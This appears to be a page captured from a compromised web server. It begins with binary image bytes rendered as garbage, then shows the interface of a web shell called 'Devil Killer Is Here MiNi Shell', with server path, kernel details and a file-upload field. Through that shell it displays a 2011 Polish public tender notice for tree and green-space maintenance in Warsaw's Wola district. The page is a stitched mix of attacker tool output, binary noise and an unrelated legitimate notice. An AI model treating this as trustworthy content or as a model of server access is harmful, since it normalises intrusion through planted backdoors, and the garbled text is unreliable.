JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/89415-N-2011.html

<p class="kh_header"><b>Warszawa: Pielęgnacja drzewostanu i terenów zieleni w 2011 roku na terenie administrowanym przez Zakład Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy - wszystkie administracje oraz pielęgnacja drzewostanu i terenu zieleni wraz z koszeniem trawy w 2011 roku na obszarze wpisanym do rejestru zabytków na terenie administracji Koło, zgodnie z Decyzją nr 1537-A z dnia 09.11.1992 r. oraz na terenie administracji Młynów zgodnie z Decyzją nr 1172/2009 z dnia 09.10.2009 r.</b><br>
<b>Numer ogłoszenia: 89415 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy , ul. gen. Józefa Bema 70, 01-225 Warszawa, woj. mazowieckie, tel. 022 6323215, faks 022 6327242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnwola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja drzewostanu i terenów zieleni w 2011 roku na terenie administrowanym przez Zakład Gospodarowania Nieruchomościami w Dzielnicy Wola m. st. Warszawy - wszystkie administracje oraz pielęgnacja drzewostanu i terenu zieleni wraz z koszeniem trawy w 2011 roku na obszarze wpisanym do rejestru zabytków na terenie administracji Koło, zgodnie z Decyzją nr 1537-A z dnia 09.11.1992 r. oraz na terenie administracji Młynów zgodnie z Decyzją nr 1172/2009 z dnia 09.10.2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Zamawiający dopuszcza składanie ofert częściowych. 

Zakres prac na terenie wszystkich administracji (dla oferty częściowej nr I) obejmuje: 
       1) cięcia pielęgnacyjne drzew (w tym krzewów wysokich o formie drzewiastej np: lilak, sumak,         powyżej 2,50 m wysokości) dla obwodów pni mierzonych na wysokości 130 cm lub         bezpośrednio pod koroną drzewa, gdy wysokość pnia jest niższa niż 130 cm, z użyciem lin         lub podnośnika i wywozem pozyskanej masy - obwód pnia w cm:
           a) do 30 cm - 190 szt., b) 31-60 cm - 185 szt., c) 61- 90 cm - 180 szt., d) 91-120 cm - 210         szt., e) 121-150 cm - 195 szt., f) 151-180 cm - 190 szt., g) 181-210 cm - 163 szt.,                                h) 211-240 cm - 150 szt., i) 241-270 cm - 140 szt., j) 271-300 cm - 73 szt.,                                                    k) powyżej 301 cm - 4 szt.,
       2) wycinanie drzew (w tym krzewów wysokich o formie drzewiastej np.: lilak, sumak, powyżej         2,50 m wysokości) dla obwodów pni mierzonych na wys. 130 cm lub bezpośrednio pod         koroną drzewa, gdy wysokość pnia jest niższa niż 130 cm, z użyciem lin lub podnośnika,         usunięciem karpy i wywozem pozyskanej masy - obwód pnia w cm:
           a) do 15 cm - 25 szt., b) 16-30 cm - 30 szt., c) 31-60 cm - 26 szt., d) 61-90 cm - 27 szt.,                                            e) 91-120 cm - 32 szt., f) 121-150 cm - 32 szt., g) 151-180 cm - 31 szt., h) 181-210 cm -                            30 szt., i) 211-240 cm - 28 szt., j) 241-270 cm - 23 szt., k) 271-300 cm - 11 szt.,                                           l) powyżej 301 cm - 3 szt.,
       3) frezowanie karp drzew (nieujęte w poz. 2) na gł. 20 cm, z wyrównaniem terenu ziemią żyzną                                      i wywozem pozyskanej masy - dla średnic pniaka po drzewie w miejscu cięcia w cm:
a) do 30 cm - 4 szt., b) 31-80 - 4 szt., c) powyżej 81 cm - 4 szt.,
 4) usuwanie karp drzew (nieujęte w poz. 2) z zasypaniem dołu ziemią żyzną i wywozem      pozyskanej masy dla średnic pniaka po drzewie w miejscu cięcia w cm:
   a) do 30 cm - 4 szt., b) 31- 80 cm - 4 szt.,  c) powyżej 81 - 4 szt.,
       5) pielęgnację drzew nowoposadzonych (po upływie gwarancji):
   a) cięcia korygujące koronę - 145 szt., b) palikowanie drzew - 62 kpl., c) wymianę    zniszczonego palika - 17 szt., d) wymianę zniszczonej poprzeczki - 17 szt., e) wymianę    zniszczonego wiązania - 17 szt., f) demontaż opalikowania - 110 kpl., g) ściółkowanie korą    z drzew iglastych warstwą 5 cm, z dowozem - 70 szt.,  h) podlewanie (20 dcm3) z dowozem    wody - 160 szt.  x  4  = 640 szt., i) odtworzenie mis z pieleniem i wywozem - 105 szt.,    j) nawożenie drzew nawozami mineralnymi wieloskładnikowymi - 40 szt.,    
       6) przesadzenie drzew nopwoposadzonych o obwodzie pni 12-18 cm - 12 szt.,
      7) cięcie żywopłotów oraz krzewów niskich (do 2,50 m wysokości), rosnących indywidualnie lub         w grupie wraz z wywozem urobku - 59 124,22 m2 x 2 = 118 248,44 m2,
       8) nasadzenie drzew (wraz z kosztem sadzonki) obwód pnia 12-18 cm, forma naturalna na         terenie płaskim w gr. kat. III w doły o wymiarach 1,0 x 0,7, z wywozem urobku,                                        z uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem (nieujętym w poz. 5h) - obwód         pnia w cm (zgodny z parametrami szkółkarskimi):
          a) 12-14 cm - 23 szt., b) 14-16 cm - 197 szt., c) 16-18 - 18 szt.,  
      9) nasadzenie krzewów indywidualnie lub w grupach wraz z kosztem materiału, sadzonka                           w pojemniku, na terenie płaskim w gr. kat. III w doły o szerokości 50 cm, z wywozem urobku,                        z całkowitym uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem i korowaniem -                350 szt.,
    10) nasadzenie krzewów (żywopłotów) na goły korzeń wraz z kosztem materiału, na terenie         płaskim w gr. kat. III w rowy o szerokości 30-50 cm, z wywozem urobku, z całkowitym        uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem i korowaniem -  5750 szt.,
    11) wycinkę krzewów niskich (żywopłotów, rosnących indywidualnie lub w grupie) z usunięciem        systemu korzeniowego (pomiar-płaszczyzna rzutu korony) - 170,00 m2,
    12) zakładanie i renowację trawników wraz z podlewaniem - 2 850,00 m2,
    13) opryski żywopłotów, różanek przeciw np.: mszycy  środkiem grzybobójczym lub        owadobójczym - 200,00 m2,
    14) dostawę ziemi w celu np.: niwelacji terenu przed zagospodarowaniem zielenią, zmiany        sposobu wykorzystania piaskownicy na klomb itp. - 80,00 m3,
    15) wywóz gałęzi, konarów (nieujętych w poz. 1, 2, 5a, 7, 11, 16) - 170,00 m3,
    16) niezwłoczne usuwanie zagrożeń (np.: wiatrołomy, pęknięte konary itp.) zgłoszonych przez        Kierownika Administracji lub osobę przez niego wskazaną bez konieczności wystawiania        zlecenia, o każdej porze doby wraz z wywozem urobku oraz usunięciem karpy - 55 szt.
    17) zakup i posadzenie kwiatów ozdobnych np.: pelargonia, werbena, chryzantema itp. (różne        kolory), otoczenie siedziby administracji ZGN Wola - 280 szt.,
    18) zakup i posadzenie kwiatów ozdobnych typu np. bratek, aksamitka itp. (różne kolory) -                       210 szt.,
    19) sporządzenie ekspertyzy dendrologicznej - 4 szt.
       
Zakres prac na terenie administracji Koło i Młynów (dla oferty częściowej nr II) obejmuje:
I.  Konserwację zieleni w tym:
      1) cięcia pielęgnacyjne drzew (w tym krzewów wysokich o formie drzewiastej np: lilak, sumak,         powyżej 2,50 m wysokości) dla obwodów pni mierzonych na wysokości 130 cm lub         bezpośrednio pod koroną drzewa, gdy wysokość pnia jest niższa niż 130 cm, z użyciem lin         lub podnośnika i wywozem pozyskanej masy - obwód pnia w cm:
          a) do 30 cm - 31 szt., b) 31-60 cm - 10 szt., c) 61-90 cm - 13 szt., d) 91-120 cm - 12 szt.,                                              e) 121-150 cm - 15 szt.,  f) 151-180 cm - 13 szt., g) 181-210 cm - 12 szt., h) 211-240 cm -        11 szt., i) 241-270 cm - 5 szt., j) 271-300 cm - 5 szt.,  k) powyżej 301 cm - 2 szt.,
      2) wycinanie drzew (w tym krzewów wysokich o formie drzewiastej np.: lilak, sumak, powyżej         2,50 m wysokości) dla obwodów pni mierzonych na wysokości 130 cm lub bezpośrednio pod         koroną drzewa, gdy wysokość pnia jest niższa niż 130 cm, z użyciem lin lub podnośnika,         usunięciem karpy i wywozem pozyskanej masy - obwód pnia w cm:
           a) do 15 cm - 3 szt., b) 16-30 cm - 3 szt., c) 31- 60 cm - 3 szt., d) 61- 90 cm - 3 szt.,                                            e) 91-120 cm - 3 szt., f) 121-150 cm - 3 szt., g) 151-180 cm - 3 szt., h) 181-210 cm - 3 szt.,                                i) 211-240 cm - 3 szt., j) 241-270 cm - 3 szt., k) 271-300 cm - 3 szt., l) powyżej 301 cm -                                2 szt.,
 3) usuwanie karp drzew (nieujęte w poz. 2) z zasypaniem dołu ziemią żyzną i wywozem      pozyskanej masy - dla średnic pniaka po drzewie w miejscu cięcia w cm:
    a) do 30 cm - 1 szt., b) 31- 80 cm - 2 szt.,  c) powyżej 81 - 2 szt.,
       4) pielęgnację drzew nowoposadzonych (po upływie gwarancji):
    a) cięcia korygujące koronę - 18 szt., b) palikowanie drzew - 13 kpl., c) wymianę     zniszczonego palika - 8 szt., d) wymianę zniszczonej poprzeczki -  13 szt., e) wymianę     zniszczonego wiązania - 13 szt., f) demontaż opalikowania - 30 kpl., g) ściółkowanie korą     drzew iglastych warstwą 5 cm, z dowozem - 35 szt., h) podlewanie (20 dcm3) z dowozem     wody - 15 szt.  x  4  = 60 szt., i) odtworzenie mis z pieleniem i wywozem - 15 szt.,     j) nawożenie drzew nawozami mineralnymi wieloskładnikowymi - 35 szt.,  
5) przesadzenie drzew nowoposadzonych o obwodzie pni 12-18 cm - 4 szt.,
       6) cięcie żywopłotów oraz krzewów niskich (do 2,50 m wysokości), rosnących indywidualnie lub         w grupie wraz z wywozem urobku - 2 522,38 m2, 
       7) nasadzenie drzew (wraz z kosztem sadzonki) obwód pnia 12-18 cm, forma naturalna na         terenie płaskim w gr. kat. III w doły o wymiarach 1,0 x 0,7, z wywozem urobku,                                         z uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem (nieujętym w poz. 5h) - obwód         pnia w cm (zgodny z parametrami szkółkarskimi):
           a) 12-14 cm - 1 szt., b) 14-16 cm - 20 szt., c) 16-18 - 1 szt.,  
       8) nasadzenie krzewów indywidualne lub w grupach wraz z kosztem materiału, sadzonka                        w pojemniku, na terenie płaskim w gr. kat. III w doły o szerokości 50 cm, z wywozem urobku,         z całkowitym uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem i korowaniem -                     40 szt.,
       9) nasadzenie krzewów (żywopłotów) na goły korzeń wraz z kosztem materiału, na terenie         płaskim w gr. kat. III w rowy o szerokości 30-50 cm, z wywozem urobku, z całkowitym         uzupełnieniem mieszanką ziemi żyznej wraz z podlewaniem i korowaniem -  215 szt.,
     10) wycinkę krzewów niskich (żywopłotów, rosnących indywidualnie lub w grupie) z usunięciem         systemu korzeniowego (pomiar-płaszczyzna rzutu korony) - 100,00 m2,
     11) zakładanie i renowację trawników wraz z podlewaniem - 560,00 m2,
     12) opryski żywopłotów, różanek przeciw np.: mszycy  środkiem grzybobójczym lub         owadobójczym - 250,00 m2,
     13) dostawę ziemi w celu np.: niwelacji terenu przed zagospodarowaniem zielenią, zmiany         sposobu wykorzystania piaskownicy na klomb itp. - 20,00 m3,
     14) wywóz gałęzi konarów (nieujętych w poz. 1, 2, 4a, 6, 10, 15) - 20,00 m3,
     15) niezwłoczne usuwanie zagrożeń (np.: wiatrołomy, pęknięte konary itp.) zgłoszonych przez         Kierownika Administracji lub osobę przez niego wskazaną bez konieczności wystawiania         zlecenia, o każdej porze doby wraz z wywozem urobku oraz usunięciem karpy - 8 szt.,
     16) zakup i posadzenie kwiatów ozdobnych typu np. bratek, aksamitka itp. (różne kolory) -                          30 szt.,
     17) sporządzenie ekspertyzy dendrologicznej - 2 szt.

II. Koszenie, grabienie i wywóz trawy bezpośrednio po skoszeniu
  38 896,72 m2  x 4 = 155 586,88 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wpłata wadium w wysokości 11 600,00 zł                              
w przypadku składania ofert na wszystkie części zamówienia.
W przypadku składania ofert częściowych:
- dla oferty częściowej nr I - 10 000,00 zł  - dla oferty częściowej nr II - 1 600,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia oraz wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał lub wykonuje co najmniej 2 usługi w zakresie zgodnym z przedmiotem zamówienia:
     - o wartość brutto min. 250 tys. zł każda,  w przypadku składania oferty częściowej nr I,
     - o wartość brutto min. 20 tys. zł każda, w przypadku składania oferty częściowej nr II,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia, a w szczególności co najmniej:         w przypadku składania oferty częściowej nr I
         - 1 osobą przewidzianą do kierowania pracami, posiadającą co najmniej wykształcenie             wyższe kierunkowe: ogrodnicze lub rolnicze lub leśne lub architekta krajobrazu i co             najmniej 4 lata praktyki przy utrzymaniu i urządzaniu zieleni,  
         - 1 osobą pełniącą funkcję brygadzisty, posiadającą co najmniej wykształcenie średnie             kierunkowe: ogrodnicze lub rolnicze lub leśne lub tereny zieleni i co najmniej 3 lata             praktyki przy utrzymaniu i urządzaniu zieleni,  
    - 5 osobami przewidzianymi do prowadzenia prac o charakterze technicznym, posiadającymi co najmniej wykształcenie średnie lub zawodowe kierunkowe: ogrodnicze lub rolnicze lub leśne lub tereny zieleni i co najmniej 2 lata praktyki przy utrzymaniu                      i urządzaniu zieleni, 
      w przypadku składania oferty częściowej nr II                       
    - 1 osobą przewidzianą do kierowania pracami, posiadającą co najmniej wykształcenie        wyższe kierunkowe: ogrodnicze lub rolnicze lub leśne lub architekta krajobrazu i co        najmniej 5 lat praktyki przy utrzymaniu i urządzaniu zieleni, w tym co najmniej 1 rok        praktyki zawodowej przy utrzymaniu i urządzaniu zieleni na terenie wpisanym do rejestru        zabytków (zgodnie z § 8 ust. 3 lub § 13 Rozporządzenia Ministra Kultury z dnia 9        czerwca 2004 r. - Dz. U. Nr 150, poz. 1579),                           
         - 1 osobą pełniącą funkcję brygadzisty, posiadającą co najmniej wykształcenie średnie            kierunkowe: ogrodnicze lub rolnicze lub leśne lub tereny zieleni i co najmniej 3 lata            praktyki przy utrzymaniu i urządzaniu zieleni,
   - 2 osobami przewidzianymi do prowadzenia prac o charakterze technicznym, posiadającymi co najmniej wykształcenie średnie lub zawodowe kierunkowe: ogrodnicze lub rolnicze lub leśne lub tereny zieleni i co najmniej 2 lata praktyki przy utrzymaniu                     i urządzaniu zieleni,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadania aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia, na kwotę:
     - oferta częściowa nr I - co najmniej 150 tys.
     - oferta częściowa nr II - co najmniej   50 tys.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
